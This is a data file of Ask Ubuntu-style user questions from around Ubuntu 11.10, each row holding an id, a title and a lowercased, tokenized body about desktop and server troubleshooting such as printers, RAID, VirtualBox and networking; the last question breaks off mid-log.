71307	can not print to hp d1360	my printer is a hp d1360 and it was working fine until i update to ubuntu 11.10. although i can print the test page and the status of the printer is ready to print . i can not print anything fron firefox , document viewer , libreoffice . i downloaded the hplip software fron linuz-printers.org and installed , but still is n't working . only printer test page is working . i ran the debugger and it says it could be a bug problem if somebody could help me i will appreciated . i paste the troubleshooting logs below thanks . page 1 ( scheduler not running ? ) : { 'cups_connection_failure ' : false } page 2 ( is local server publishing ? ) : { 'local_server_exporting_printers ' : false } page 3 ( choose printer ) : { 'cups_dest ' : < cups.dest deskjet-d1300-series ( default ) > , 'cups_instance ' : none , 'cups_queue ' : 'deskjet-d1300-series ' , 'cups_queue_listed ' : true } page 4 ( check printer sanity ) : { 'cups_device_uri_scheme ' : u'hp ' , 'cups_printer_dict ' : { 'device-uri ' : u'hp : /usb /deskjet_d1300_series ? serial=cn69c1n31y04nd ' , 'printer-info ' : u'hp deskjet d1300 series ' , 'printer-is-shared ' : true , 'printer-location ' : u'hp-pavilion-dv6-notebook-pc ' , 'printer-make-and-model ' : u'hp deskjet d1300 series , hpcups 3.11.1 ' , 'printer-state ' : 3 , 'printer-state-message ' : u'ready to print ' , 'printer-state-reasons ' : [ u'none ' ] , 'printer-type ' : 8556556 , 'printer-uri-supported ' : u'ipp : //localhost:631/printers/deskjet-d1300-series ' } , 'cups_printer_remote ' : false , 'hplip_output ' : ( [ '' , '\x1b [ 01mhp linux imaging and printing system ( ver . 3.11.10 ) \x1b [ 0m ' , '\x1b [ 01mdevice information utility ver . 5.2\x1b [ 0m ' , '' , 'copyright ( c ) 2001-9 hewlett-packard development company , lp ' , 'this software comes with absolutely no warranty . ' , 'this is free software , and you are welcome to distribute it ' , 'under certain conditions . see copying file for more details . ' , '' , '' , '\x1b [ 01mhp : /usb/deskjet_d1300_series ? serial=cn69c1n31y04nd\x1b [ 0m ' , '' , '\x1b [ 01mdevice parameters ( dynamic data ) : \x1b [ 0m ' , '\x1b [ 01m parameter value ( s ) \x1b [ 0m ' , ' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ' , ' agent1-ack false ' , ' agent1-desc black cartridge ' , ' agent1-dvc 0 ' , ' agent1-health 1
71309	how do i enable remote desktop connection on xubuntu 11.10 ?	how do i enable remote desktop connection on xubuntu 11.10 ? i do not find any options such as those present in ubuntu ?
71311	powertop is reporting 0 wakeups/second - can this be right ?	i 'm investigating tweaking my power consumption performance on ubuntu . when i run powertop , the output seems strange , and not much like any of the screenshots i see on the web . that might be explained by recent version changes , but one thing seems wrong : the critical `` wakeups/second '' figure is 0.0.. can this be right ? here 's the 'overview ' output : summary : 0.0 wakeups/second , 0.0 gpu ops/second and 0.0 vfs ops/sec usage events/s category description 24.1 ms/s 0.0 process /usr/lib/nspluginwrapper/i386/linux/npviewer.bin -- plugin /usr/lib/flashplugin- 10.8 ms/s 0.0 process /usr/lib/firefox-7.0.1/plugin-container /var/lib/flashplugin-installer/npwrappe 9.3 ms/s 0.0 process /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch 7.7 ms/s 0.0 process powertop 5.2 ms/s 0.0 process /usr/bin/gnome-shell 3.4 ms/s 0.0 process /usr/lib/firefox-7.0.1/firefox 2.6 ms/s 0.0 process gnome-terminal 1.9 ms/s 0.0 interrupt [ 47 ] i915 1.9 ms/s 0.0 timer hrtimer_wakeup 1.7 ms/s 0.0 process /usr/lib/udisks/udisks-daemon [ etc , etc ] idle stats as follows : package | core | cpu 0 cpu 1 poll 0.0 % | poll 0.0 % | poll 0.0 % 0.0 ms 0.0 % 0.0 ms c1-snb 0.9 % | c1-snb 1.2 % | c1-snb 1.4 % 0.4 ms 1.0 % 0.4 ms c3-snb 0.5 % | c3-snb 0.7 % | c3-snb 0.8 % 0.6 ms 0.6 % 0.6 ms c6-snb 0.1 % | c6-snb 0.1 % | c6-snb 0.1 % 0.6 ms 0.0 % 0.8 ms c7-snb 96.0 % | c7-snb 94.5 % | c7-snb 93.7 % 3.0 ms 95.4 % 5.2 ms | core | cpu 2 cpu 3 | poll 0.0 % | poll 0.0 % 0.0 ms 0.0 % 0.0 ms | c1-snb 0.7 % | c1-snb 0.6 % 0.5 ms 0.7 % 0.4 ms | c3-snb 0.3 % | c3-snb 0.2 % 0.2 ms 0.4 % 0.5 ms | c6-snb 0.1 % | c6-snb 0.0 % 0.6 ms 0.1 % 0.9 ms | c7-snb 97.4 % | c7-snb 97.6 % 6.3 ms 97.2 % 7.1 ms frequency stats show 0.0 % for everything , and device stats seem to have loads at 100 % usage device name 5.7 % cpu use 86.7 % display backlight 65.1 % display backlight 100.0 % usb device : xhci host controller 100.0 % usb device : usb-device-8087-0024 100.0 % pci device : intel corporation centrino advanced-n 6230 100.0 % radio device : sony notebook control driver 100.0 % usb device : ehci host controller 100.0 % pci device : nec corporation upd720200 usb 3.0 host controller 100.0 % radio device : iwlagn 100.0 % pci device : realtek semiconductor co. , ltd. rts5116 pci express card reader 100.0 % usb device : xhci host controller [ etc , etc ] so , my question is : is something wrong ? i assume powertop is mis-reporting some things , right ? i 'm running on a sony vaio , and they 're notorious for being difficult hardware for linux ...
71312	pressing the power button does not turn off the computer in xubuntu	i have installed xubuntu 11.10 on a compaq presario p4 . i am using it headlessly , to serve files . so the way i can turn off the box is by pressing the power button once . but it refuses to do it . any advice ? i have configured in the settings manager = > power manager so as to effect a shutdown on pressing the power button . i have also checked in the settings editor that property `` xfce4-power-manager = > power-button-action '' takes value of 4 .
71313	proxy authentication in system settings but with a twist	we have a password policy that enforces the users to use special characters in their passwords . hence some passwords will be gt4 @ gj # k for example . now to specify the system wide proxy settings ( why is n't this done more intuitively like for instance the way it was done in synaptic ; and why is synaptic not included by default anymore either ... ) you have to use username : password @ host in the host field for authenticating proxies . our problem no is that some passwords have the @ sign in them so it breaks this simple system . how can i employ a system wide proxy to work with apt and the system updater that allows real world passwords ?
71315	desktop speedup under $ 100	i have a reasonably recent workstation running 11.10 with an amd-athalon ( 4 cores ) and an asus motherboard . i would like to spend about $ 100 to speed it up i have several options and was wondering how to figure out which would make the most difference with a budget of about $ 100 . bump memory from 4gb - > 8gb ( or 12gb ) install a ssd boot drive video card something else ? ? ? ? actually what would be even better would be to have some sort of tool to tell me where the bottleneck is .
71317	how do i report a bug in te language support preferences ?	i installed my system using us english , but as my native tongue is norwegian ( bokm책l ) i would like to use that on a daily basis on my system . more important , i want to use the norwegian number formats . however , in the language support settings , only norwegian nynorsk is available . i know there is norwegian bokm책l support , as my home computer is installed with it . but it 's not available from the `` install/remove languages '' dialog .
71322	securecrt crashes since upgrade to 11.10	i 've been using ubuntu 11.04 for a few months now ... recently i have upgraded to ubuntu 11.10 and since the upgrade securecrt ssh client has not been able to run ... it keeps stalling and crashing . can anyone help me as to where to start looking for the problem or maybe someone has had a similar one .
71325	how do i make the folderview plasmoid for plasma desktop use nautilus ?	i have plasma desktop but i ca n't seem to find a way to get the plasmoid to point to nautilus . it always asks how to open filetype `` file : /// '' . the fact this is a protocol even weirder .
71327	kubuntu 11.10 lot of networking problems	since i upgrade to 11.10 i have a lot of problems with kde . first of all there are problems in configuring a static ip address . just to explain @ home i have a normal fiber adsl and i use a dhcp . when i go to a customer i must insert a static ip address . with ifconfig everything seems ok but there is something wrong in searching dns names . ( i have installed ubuntu and was going ok again ) . now i have reinstalled again kubuntu 11.10 and i have the same problem in addition today i have discovered that if i connect to a network in another customer office the desktop freezes and i could only switch between windows with alt+tab . no fn key or right click to open run command works . so i unplugged network ( configuration is just dhcp here ) and tried on another position in office . it was the same . my laptop freezes when connected , a fedora 14 of a friend works . so i decided to connect my galaxy s ii as usb network device . everything is ok for like 3 minutes . when i noticed a little loss of signal again the desktop freezes and i must work ( like now ) just switching between windows with alt+tab ) . additional information : unplugging network or restarting it via konsole does not not solve the freezing problem . every time i must open a console and reboot . any idea of what tests to do ? just a recommendation : if i must post here logs or something else please guide me . i use linux since ubuntu 9 but i am not an `` expert '' .
71331	xfce empathy notification icon	i 'm using empathy in xfce4 , and i appear to be having both a notification icon as well as the messaging menu . is it possible to hide the notification icon ? screenshot : i 'm using 11.10
71332	kernel panics with `` can not open root device '' error , where do i append the `` root= '' option ?	whenever i try to boot with linux kernel 3.0.0.13 ( the one installed by the upgrades ) i get a kernel panic error : vfs : can not open root device `` sda1 '' or unknown block ( 0,0 ) please append a correct `` root= '' boot option ; luckily enough if i boot using the previous version i do n't have any issue . how can i solve this ? where should i append the correct root= option ? if i do n't get this kernel to work , how can i remove it as the default and stick to the older one ?
71334	lenovo x120e only boots into windows after dual boot installation	i possess a lenovo x120e laptop powered with amd fusion e-350 processor . as i wish to have a dual boot machine , i installed ubuntu desktop 11.10 amd64 along side windows 7 on it . the installation was successful but the while booting instead of grub giving me options to choose which os to boot , my machine directly boots windows 7 . i have tried the steps mentioned at the following link https : //help.ubuntu.com/community/x120e i successful installation had legacy and uefi boot enabled . when i tried installing with only legacy boot enabled , the installation halts in between . it would be deeply appreciated if someone could help .
71339	email threads by subject in thunderbird ( just as in gmail )	is it possible to have threaded email conversations in thunderbird just like how it is in gmail ? how can i do that ?
71341	triple-head on a lenovo t520	lenovo t520 with integrated intel hd graphics + a nvidia card ( optimus ) ubuntu 11.10 on the computer . i would like to use the built-in screen plus two external screens . this pdf indicates that it is possible to connect up to four external monitors to the laptop . the information is windows only . i was planning to disable the nvidia card , since i have read that linux support for optimus is not good . questions : has anyone set up three monitors on nvidia hardware ? has anyone set up three monitors using intel hd 3000 ? can i expect it to work out of the box , or are there tricks i need to be aware of ?
71346	intel ac'97 sound problem	i just installed ubuntu 11 and my sound is n't working . more specifically if the sound is all the way up i can hear very faint noises . i 've read around and this seems to be a common problem historically , but none of the fixes are working for me . there appears to be a similar question already out there no sound on a realtek ac97 $ aplay -l **** list of playback hardware devices **** card 0 : ich5 [ intel ich5 ] , device 0 : intel ich [ intel ich5 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : ich5 [ intel ich5 ] , device 4 : intel ich - iec958 [ intel ich5 - iec958 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 $ lspci | grep audio 00:1f.5 multimedia audio controller : intel corporation 82801eb/er ( ich5/ich5r ) ac'97 audio controller ( rev 02 ) i 've ensured that my volume is up in alsamixer from this thread i 've also tried this fix from the guide , with no luck . i 've tried to update to the newest alsa drivers , but also no luck . this post from 2007 even suggested downgrading to a different kernel rev . i am tempted to try it , but there has got to be a better way . please let me know if there is anymore information that i provide .
71348	how can i configure a checkpoint ssl vpn ?	i have a brand new laptop ( yay ! ) running 64bit oneiric ocelot and i 'm still figuring out the pieces missing from my old 32bit system . i need to connect to a checkpoint ssl vpn at work , but there seems to be no official client for 64bit linux . from the looks of it it 's a simple ssl tunnel of some kind , but i have no details . on my old system i used to run the snx software but there 's no 64bit version available , so i 'm looking for options . is there a compatible software ? can i somehow run the 32bit client ? can i configure the vpn using the usual system tools ? for what it 's worth i 've been able to run the old snx client inside a 32 bit chroot jail , following for the most part the instructions at ubuntuforums.org . you can skip the parts about mounting filesystems in the chroot environment , but you 'll need to install a 32 bit kernel , libx6 and libstdc++5 inside the chrooted environment .
71350	how do i enable hibernation on a sony vaio vgn-ns235j ?	i use ubuntu 11.10 on my old sony vaio vgn-ns235j i works very smooth and is fast in every aspect . one problem i am facing is that i ca n't hibernate it as i can do it on windows earlier , how do i enable it ?
71351	how to make only windows from active desktop visible when in `` activities '' ?	when i go to the activities-corner , all my windows from all my desktops becomes visible kind of like the scale plug-in works . however , i have many windows and i have my desktop well arranged and want only the windows from my currently active desktop to show up . how can i achieve this ? i 'm not afraid of hacking a bit , but i do n't know where to start . : )
71359	where is `` open with ... '' in nautilus ?	in ubuntu 11.04 i usually edit my *.fig files by clicking on the icons . the application ( script ) which opened the file was texfig . this script was chosen by `` open with ... '' in nautilus . but now there is no possibilities to choose other applications than the predefined ones appropriate to the mimetype . how can i define a default application ( or a self made script ) in nautilus for the x-xfig mimetype ?
71361	how do i restart evolution 's mail migration ?	the oneiric update on my mother 's computer required a migration to a new email storage format on the first evolution start . unfortunately , the migration crashed in the middle and only a small part of the old mails were correctly migrated . i know there 's a backup of the old mails and i would like to restart the migration process . how can i do that ?
71363	which ubuntu version for postgresql 9 ?	for a database server that will be running in its own vps : is it better-supported to install the latest ocelot 11.10 release with the standard package for postgresql9 , or to install 10.04 lts with the postgresql package from backports ? are there any stability or performance issues with either configuration ? which one would be the easier upgrade path to the next lts ?
71365	how to share movie file in ubuntu one file ( share with me ) ?	how to share movie file in ubuntu one file ( share with me ? ) and how my friend get my movie file in ubuntu one ( share with me ) ?
71366	are there any good screencasters that can run in wine ?	i need to make some tutorials and i 'm having a lot of problems in ubuntu 11.10 64bits + gnome shell . tibesti does n't work . kazam does n't work too . gtk-recordmydesktop does n't work on gnome shell ( did n't try on unity ) so i 'm considering using wine and a windows screencaster . any suggestion would be appreciated . : ) the built-in software in gnome shell ( by pressing ctrl+alt+shift+r ) works really well , but it does n't record my voice -- it only works with video .
71367	how to detect data on a specific port ?	i am writing an app for my phone which streams data to a specific port , but i am having problems and looking for a way to listen to a port on my kubuntu 11.10 machine for incoming traffic . does anyone know a program which will show me if there is any data coming in on a specific port and how much ?
71369	using compiz by default in unity 2d	my hardware can handle compiz fine , but not unity 3d , annoyingly enough . i hate metacity more than unity 2d , so i switched compositors using compiz -- replace . however that leaves me with two problems : compiz -- replace is temporary , it will revert back to metacity , by the next reboot/login compiz leaves window decorator when the windows are maximized .
71372	how do you get window management ( window titles etc ) working properly for java applications ?	i use several java applications in my ubuntu workstation , but they are grouped as one application in the window manager and do n't have their application titles . it 's frustrating not to be able to alt tab through them individually as other applications . they also all share one question mark as an icon when tabbing though the windows .
71375	why are configuration files stored in so many different locations in the home folder ?	my question arises out of frustration and curiosity for the reasons behind the mess . let me ask by example , all referring to the home folder : thunderbird stores its files in .thunderbird google chrome stores in .config/google-chrome rhythmbox is all over the place from .gconf to .local/share and .gnome2 so from what i see , ~/ , .config , .gnome2 , and .local/share seem to be serving the same purpose of storing user configurations and databases . why is it so inconsistent ? it makes it a super nightmare if you want to share configurations between 2 operating systems like fedora and ubuntu or even two ubuntu versions like lucid and oneiric .
71376	can not connect remotly with x11 and ssh ? err : ca n't open display , what 's wrong ?	$ xterm works on the client computer in the client i have : $ echo $ display :0 in the config file in the server /etc/ssh/sshd_config : x11forwarding yes x11displayoffset 10 trying to connect to the remote server : $ ssh -x user @ host @ server01 : /etc/ssh $ xterm & [ 1 ] 4237 @ server01 : /etc/ssh $ xterm xt error : ca n't open display : xterm : display is not set ^c [ 1 ] + exit 1 xterm
71380	launcher ca n't cope with `` nautilus /home/user/ubuntu one/biologie ''	i tried to set up a launcher using the following command : '' nautilus /home/user/ubuntu one/biologie '' but if i start the launcher nautilus will try to open the folder `` /homer/user/ubuntu '' and `` /one/biologie '' . any suggestions how to solve the problem without changing the folders namefrom `` ubuntu one '' in `` ubuntuone '' ? thank you !
71383	how to disable the last typed search string in the search applications field ?	is there a way to prevent the “search applications” field ( dash home - > more apps ) from remembering the last keys typed in on the previous search . if it were blank you 'd have the convenience of the “most frequently used” block where your application will likely be listing . having the clear the search field on each visit adds extra work and clicks in bringing up the applications .
71390	ubuntu 11.10 xorg.cong file	[ edit ] thanks for everyone 's input there though but this thread is indeed a duplicate . see comments bellow i am very new to ubuntu , and i am having problem with configurating my graphic drivers . after digging solutions on how to solve that issue i noticed that the xorg.conf file is refered to very often though my system does n't have one . i looked in /etc/x11/ nothing there . is this normal ? should i create one to fine tune my monitors configuration ? if so how to proceed to create that file ? thanks a bunch for any insights
71394	how do i get bibilioteca running on wine ?	i 've got a problem with wine . i installed the package i found in the ubuntu software center but it does n't work with biblioteca pc ( that is a german dictionary ) . i have ubuntu 11.10 and it worked fine with ubuntu 11.04 . do i need to install something else , or is there any other way to get the program running under wine ?
71395	possible to use ureadahead to cache frequently used programs ?	edit i kinda answered my question with the help of this . the only question remaining is how to make the changes permanently stay in the pack-file and not be lost on reprofile . i 'll leave the question open in case someone knows of a way ( i 'll accept that as an answer then ) . /edit i use my pc in a very similar fashion after boot : i 'm using evince , chromium-browser , gmpc and gpodder most of the time . now i want to cache those programs ( at the expense of boot time if needed ) using ureadahead . now i looked at the contents of the ureadahead pack like this sudo ureadahead -- dump|grep chromium and found only icons , .dekstop files and gconf key to be cached* . so i was wondering whether there 's a way to make ureadahead cache the binaries and libraries of my most commonly used programs as well and make them open in a snap after boot . *as far as i understood ureadahead does n't really cache but rather keep a list of files and sorts them by inodes thus optimizing the access pattern but well ...
71396	sync ppa repos with ubuntu one	it is possible to sync all the repos , the ppa too , and all the applications between computers with the same ubuntu one account ? i think that could be a great idea to improove the usage and the costumization of ubuntu and computer nets .
71402	apt-get update error : no hash entry and package : header ?	when i try to update software on 11.10 i get the following errors : w : gpg error : http : //repository.akirad.net akirad-oneiric inrelease : file /var/lib/apt/lists/partial/repository.akirad.net_dists_akirad-oneiric_inrelease does n't start with a clearsigned message w : failed to fetch gzip : /var/lib/apt/lists/partial/repository.akirad.net_dists_akirad-oneiric_main_binary-i386_packages encountered a section with no package : header w : failed to fetch http : //repository.akirad.net/dists/akirad-oneiric/main/i18n/index no hash entry in release file /var/lib/apt/lists/partial/repository.akirad.net_dists_akirad-oneiric_main_i18n_index e : some index files failed to download . they have been ignored , or old ones used instead . updating software through the gui also gives me errors about downloading packages , but they are a lot less verbose . i never had any trouble performing updates in the last version of ubuntu . what do i need to do to fix this error ?
71411	will ubuntu work on my computer ?	here are the specs : microsoft windows xp media center edition version 2002 sp3 packard bell . intel ( r ) pentium ( r ) d cpu 2.80ghz 1.00 gb of ram
71418	how do i integrate gpg with the gnome keyring ?	i use mutt for gpg-signed email . with previous versions of ubuntu i could tell mutt to use gnome-gpg , which would ask for my gpg passphrase with a gui window and then store it my gnome keyring for 24 hours or until logout , whichever came first . however gnome-gpg was removed from universe in ubuntu 11.10 . is there a replacement ?
71419	ca n't see any usb device in virtualbox	in ubuntu 11.10 , i 'm unable to see any usb device in virtualbox , although i had the ext package installed , which is downloaded from oracle 's site today .
71421	default route lost on reboot	after upgrading to 11.10 , my system is `` forgetting '' the default route to the internet every time the machine gets rebooted . it `` remembers '' the route to the office ( on a second nic ) . in my /etc/network/interfaces file i have both nics configured as static and specify the ip , netmask and gateway for each . but the gateway for the external nic is no longer being set at boot time ( though it worked perfectly in 11.04 ) . i 'm wondering if it might be related to the `` waiting for network configuration '' problem that i and others seen . either way , i need a solution or at least a work-around . as requested ... route -v ( after i manually added the eth1 default gateway , of course -- to see it before , imagine the eth1 gateway line missing ) : kernel ip routing table destination gateway genmask flags metric ref use iface default 216.199.48.57.n 0.0.0.0 ug 0 0 0 eth1 default 192.168.42.1 0.0.0.0 ug 100 0 0 eth0 192.168.42.0 * 255.255.255.0 u 0 0 0 eth0 216.199.48.56 * 255.255.255.248 u 0 0 0 eth1 /etc/network/interfaces : # the loopback network interface auto lo iface lo inet loopback # office network auto eth0 iface eth0 inet static address 192.168.42.4 netmask 255.255.255.0 gateway 192.168.42.1 # internet auto eth1 iface eth1 inet static address 216.199.48.58 netmask 255.255.255.248 gateway 216.199.48.57
71422	is it possible to fully enable 3d acceleration for my old ati radeon x1650 pro ? ( rv530 ) ?	i have old graphics card - radeon x1650 pro , ( which is not supported by ati for ubuntu 11.10 ) . i 've checked unity support by following command : /usr/lib/nux/unity_support_test -p and i 've got yes in all options . however when i 'm trying to play some games - 3d is very pure . so i wonder is it possible to fully enable its 3d acceleration somehow ? or do i already have its maximum in my ubuntu 11.10 ?
71424	how do i get a lexmark x4690 printer working ?	i m trying to get my lexmark x4690 working , everything was ok with ubuntu 11.04 but since i did a clean install with 11.10 , i reinstalled the lexmark driver but i m unable to print , but the scanner works ok .
71430	i accidentally made my file system read only . how can i change it back ?	i accidentally locked my ubuntu system . now everything is read only . the closest i can remember which might have done this is , i was trying to change the authority of a fstab symllink with chown -h myusername /db . now everything is read only , file system , mounted volume , all except my home folder . even when i open the file browser as admin i.e . sudo nautilus i ca n't create and change any file or folder . what might have caused this ? help me turn things back to normal .
71432	why does my touchpad fail on resume from standby ?	on resume touchpad disables and a reboot is needed to re-activate . macbook pro 6.1 ubuntu 11.10 mac 64bit suspend - ok suspend resume - ok however , on resume in the loggin screen my touchpad works , but after i enter my password and return to the desktop the touchpad fails . a usb mouse still works fine . i have to re-boot in order to re-enable toe touchpad . this was not an issue when i had ubuntu 10.10 32bit installed . the install was a fresh install . the bcm5974 driver will not install , says codependency errors . i manually try to install all dependencies and i get this error : e : hid-dkms : subprocess installed post-installation script returned error exit status 10 e : bcm5974-dkms : dependency problems - leaving unconfigured thanks
71433	some gnome lib is missing	i 've just installed kubuntu 11.10 - and it looks like some gnome lib is missing - selectors like that : does n't work : i can not choose with a mouse tabs on the left . i 've installed gnome-common but it gave no help .
71434	how do i install a driver for a hp laserjet p1006 ?	when trying to install a driver for my hp laserjet p1006 i get the following error message : plug-in file does not match its digital signature i 'm using ubuntu 11.10 .
71441	virtualbox , ubuntu 11.10 , linux-kernel 3 : can not start virtual machine	i 've got installed oracle virtualbox v.4.1.2_ubuntu r38359 . the program vm starts with errors : warning : the character device /dev/vboxdrv does not exist . please install the virtualbox-ose-dkms package and the appropriate headers , most likely linux-headers-generic . you will not be able to start vms until this problem is fixed . ( virtualbox:5642 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( virtualbox:5642 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( virtualbox:5642 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( virtualbox:5642 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , as supposed i 've done : 1 ) sudo apt-get install virtualbox-ose virtualbox-ose-dkms the answer : virtualbox-ose is already the newest version . virtualbox-ose-dkms is already the newest version . 2 ) sudo apt-get install linux-headers-`uname -r` answer : linux-headers-3.0.0-12-generic-pae is already the newest version . if i try to launch virtual machine i got 2 windows : 1 ) the first : failed to open a session for the virtual machine winxp . the virtual machine 'winxp ' has terminated unexpectedly during startup with exit code 1 . result code : ns_error_failure ( 0x80004005 ) component : machine interface : imachine { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } 2 ) the second : kernel driver not installed ( rc=-1908 ) please install the virtualbox-dkms package and execute 'modprobe vboxdrv ' as root . tried : $ sudo modprobe vboxdrv fatal : module vboxdrv not found . ; $ /etc/init.d/virtualbox start * starting virtualbox kernel modules * no suitable module for running kernel found [ fail ]
71443	status of gnome graphics with ati cards in 11.10	has there been any fix yet for the graphics problem ? removing fglrx and installing 11.9 from ati hoses my system so i 'm not going to bother for now . my understanding is there is a fix but it has not been released yet . thanks - my first question !
71453	problem in installing security updates and recommended updates using update manager	i installed ubuntu 11.04 just few days before . then when i tried to install the packages from update manager , i got the following message . *****installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory extracting templates from packages : 93 % % extracting templates from packages : 100 % % preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory extracting templates from packages : 93 % % extracting templates from packages : 100 % % preconfiguring packages ... perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory extracting templates from packages : 93 % % extracting templates from packages : 100 % % preconfiguring packages ... ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 157111 files and directories currently installed . ) preparing to replace ubuntu-docs 11.04.2 ( using ... /ubuntu-docs_11.04.3_all.deb ) ... unpacking replacement ubuntu-docs ... dpkg : ../../src/archives.c:968 : tarobject : assertion `r == stab.st_size ' failed . ***** this is also preventing me from installing from ubuntu software center . can anyone help me with this ?
71457	how can i set up dual monitor display with ati driver ?	i have 11.10 running on a system76 laptop . without the proprietary driver i was able to set up a second monitor ( samsung 19 '' ) with extended display . when i activate the proprietary driver , the only display setting that works is `` mirror '' . when i pick to extend the display at the proper resolution ( 1280:1084 , samsung ) ( 1600:900 , laptop ) for each screen i get the following : required virtual size does not fit available size : requested= ( 2880 , 1024 ) , minimum= ( 320 , 200 ) , maximum= ( 1600 , 1600 ) . when i try to execute the resolutions that are set at default , after unchecking the `` mirror screens '' button ( 1152:864 , samsung ) ( 1600:900 , laptop ) i get the following : requested position/size for crtc 148 is outside the allowed limit : position= ( 1152 , 0 ) , size= ( 1152 , 864 ) , maximum= ( 1600 , 1600 )
71458	how do i get ricoh aficio gxe3350n to print ?	i 'm using ubuntu 11.10 and it recognizes the printer and everything , but it does n't print the jobs on the queue , until i turn the printer off and on again .
71462	problem in logging in to the system	i am using ubuntu 11.04 on my pc . i face a problem when i log in as some other user other than administrator . the error message is as follows : this is a problem with a configuration server . ( /usr/lib/libgconf2-4/gconf-sanity-check-2 exited with status 256 ) any solutions ?
71465	porting `` import gobject '' to use gobject-introspection . ( pygtk to pygi and gtk 3 )	i 've been trying to port a library from pygtk to use gi and gtk3 . the problem is i ca n't find any resources specific to the gobject imports , but only for gtk . i was hoping that if someone would translate the following for me , i would get a grasp of how to do this stuff . the gtk things itself seems to be fairly well documented , but i ca n't find anything about this . __gsignals__ = { 'cell-edited ' : ( gobject.signal_run_last , gobject.type_none , ( gobject.type_pyobject , gobject.type_pyobject , gobject.type_pyobject , gobject.type_pyobject , gobject.type_pyobject ) ) , 'selection-changed ' : ( gobject.signal_run_last , gobject.type_none , ( gobject.type_pyobject , ) ) } my assumption was , since i could n't find any specific documentation , that it would be a matter of changing the name of the constants , but i ca n't find any replacements .
71466	raid 1 array not found in server installer	so i 'm trying to install the last version of ubuntu server 11.10 64bits on my server ( replacing windows server 2008 completely ) . since i need more sata ports , i bought a pci sata raid controller based on the chipset sii3114 . the problem is that when i configure the array to raid 1 , when the installer gets to the point where i partition the disks , the raid array simply does n't appear on the list . the installer asks me if i want to `` activate the serial ata raid devices '' , i choose yes , and nothing is listed . if i instead of creating an raid 1 array , create an raid 0 array , it appears on the list to partition the disk . this last part , is what i do n't understand , it gets recognized when it is a raid 0 array , but if it is a raid 1 array it does n't . i 've read the fakeraid wiki on ubuntu wiki , and also this post : raid 10 not being found by installer running in raid 1 , and executing the shell on the installer and running the command dmraid -r , i get : /dev/sdb : sil , `` sil_bhbgdfdcfdfc '' , mirror , ok , 976771072 sectors , data @ 0 /dev/sda : sil , `` sil_bhbgdfdcfdfc '' , mirror , ok , 976771072 sectors , data @ 0 looks good i think . when in raid 0 , using the same commands , i get : /dev/sdb : sil , `` sil_bhbgdfdcfdfc '' , stripe , ok , 976771072 sectors , data @ 0 /dev/sda : sil , `` sil_bhbgdfdcfdfc '' , stripe , ok , 976771072 sectors , data @ 0 everything looks ok , i guess , it 's the first time i 'm installing ubuntu server for real , i 've installed 4 or 5 times on vmplayer to see how everything works . if i do n't configure an array , the disks are recognized with no problem whatsoever , if the pci card , was n't detected properly it would n't show any disks connected to the card in any instance i think . the card is also capable of raid 5 and raid 10 , but i have n't tested that yet , later when i arrive home , i will see if the installer detects those raid arrays . edit : so i arrived home , and started googling again , and i found this , so i ran the command dmraid -ay : error : device-mapper target type `` mirror '' is not in the kernel . raid set `` sil_bhbgdgaaaaba '' was not activated . then i googled for this error , and what i found kind of scared me , this , basically all i have to do is recompile the kernel with mirroring support , i ca n't recompile the kernel i simply do n't have the knowledge to do it.. yet i mean.. can anyone give me a solution that does n't involve recompiling the kernel ? second edit : i just downloaded and burned an ubuntu live cd , and guess what ? the raid array is detected on the spot ( i 'm currently installing ubuntu in the raid array ) . now i 'm just plain confused , i tough the ubuntu server was a ubuntu version but without an windows manager . third edit : just saved the syslog , to have more information to show : oct 24 22:46:43 anna-install : installing dmraid-udeb oct 24 22:46:43 anna [ 10984 ] : debug : retrieving dmraid-udeb 1.0.0.rc16-4.1ubuntu4 oct 24 22:46:43 anna [ 10984 ] : debug : retrieving libdmraid1.0.0.rc16-udeb 1.0.0.rc16-4.1ubuntu4 oct 24 22:46:43 disk-detect : serial ata raid disk ( s ) detected . oct 24 22:46:44 disk-detect : enabling dmraid support . oct 24 22:46:44 kernel : [ 76.836245 ] device-mapper : table : 253:0 : mirror : unknown target type oct 24 22:46:44 kernel : [ 76.836248 ] device-mapper : ioctl : error adding target to table oct 24 22:46:44 disk-detect : error : oct 24 22:46:44 disk-detect : device-mapper target type `` mirror '' is not in the kernel oct 24 22:46:44 disk-detect : oct 24 22:46:44 disk-detect : raid set `` sil_bhbgdgdefacd '' was not activated oct 24 